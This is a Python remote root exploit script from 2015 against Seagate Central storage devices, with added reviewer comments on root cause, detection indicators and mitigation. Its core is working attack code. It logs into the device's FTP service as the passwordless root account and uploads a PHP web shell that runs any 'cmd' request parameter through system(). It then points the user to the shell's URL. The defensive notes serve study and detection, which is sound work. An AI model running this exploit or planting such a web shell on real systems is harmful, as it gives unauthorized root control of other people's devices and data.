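#!/usr/bin/python
# seagate_ftp_remote_root.py
#
# Seagate Central Remote Root Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# May 2015
#
# -Synopsis-
#
# Seagate Central by default has a passwordless root account (and no option to change it).
# One way to exploit this is to log into its ftp server and upload a php shell to the webroot.
# From there, we can execute commands with root privileges as lighttpd is also running as root.
#
# -Fixes-
#
# Seagate scheduled its updates to go live on April 28th, 2015.
#
# Tested Firmware Version: 2014.0410.0026-F
#
# -Reviewer notes-
#
# Root cause, as described in the synopsis, is a chain of three weaknesses:
#   1. a root account with no password that the owner cannot change,
#   2. an FTP service that accepts that account and can write into the web root,
#   3. a web server (lighttpd) running as root, so uploaded PHP runs as root.
# Removing any one link breaks the chain.
#
# What to look for on an affected device or in network logs:
#   - FTP sessions that authenticate as "root",
#   - FTP STOR commands targeting the web root path used below,
#   - unexpected .php files appearing in the web root,
#   - HTTP requests to such a file carrying a "cmd" parameter.
#
# Mitigation: install the vendor firmware released after the tested version
# (the author reports the fix was scheduled for April 28th, 2015) and keep the
# device's FTP and HTTP services unreachable from untrusted networks.
#
import sys
from ftplib import FTP

# NOTE(review): never referenced below; FTP(host) connects on ftplib's default port.
port = 21

# File content that main() writes locally and uploads. It echoes the "cmd"
# request parameter back (unescaped) and hands it to PHP's system().
php_shell = """
<?php
if(isset($_REQUEST['cmd']))
{
$cmd = ($_REQUEST["cmd"]);
echo "<pre>$cmd</pre>";
system($cmd);
}
?>
"""

php_shell_filename = "shell.php"

# Remote directory used both as the FTP upload target and as the URL path in
# the final message, i.e. the script treats it as web-served.
seagate_central_webroot = "/cirrus/"


def main():
    """Write the PHP file locally, upload it over FTP as root, and print its URL.

    Reads the target host from ``sys.argv[1]``; prints a usage line and returns
    when no host is given. Any exception from the local write or from the FTP
    session is printed as ``Error: ...`` and ends the run. Always returns None.

    Side effects: leaves ``shell.php`` in the current working directory and
    stores a copy under ``seagate_central_webroot`` on the remote host.
    """
    if len(sys.argv) < 2:
        print("Usage: %s <host>" % sys.argv[0])
        return

    host = sys.argv[1]

    # Stage the payload on disk so it can be streamed by storbinary() below.
    try:
        with open(php_shell_filename, 'w') as shell_file:
            shell_file.write(php_shell)
    except Exception as error:
        print("Error: %s" % error)
        return

    try:
        ftp = FTP(host)
        try:
            # No password is supplied: this is the passwordless root account
            # from the synopsis. A patched device should reject this login.
            ftp.login("root")
            # Context manager closes the local handle even if the transfer
            # fails (the original left it open).
            with open(php_shell_filename, 'rb') as upload:
                ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, upload)
        finally:
            # Release the control connection on the error path as well.
            ftp.close()
    except Exception as error:
        print("Error: %s" % error)
        return

    print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename))
    return


if __name__ == "__main__":
    main()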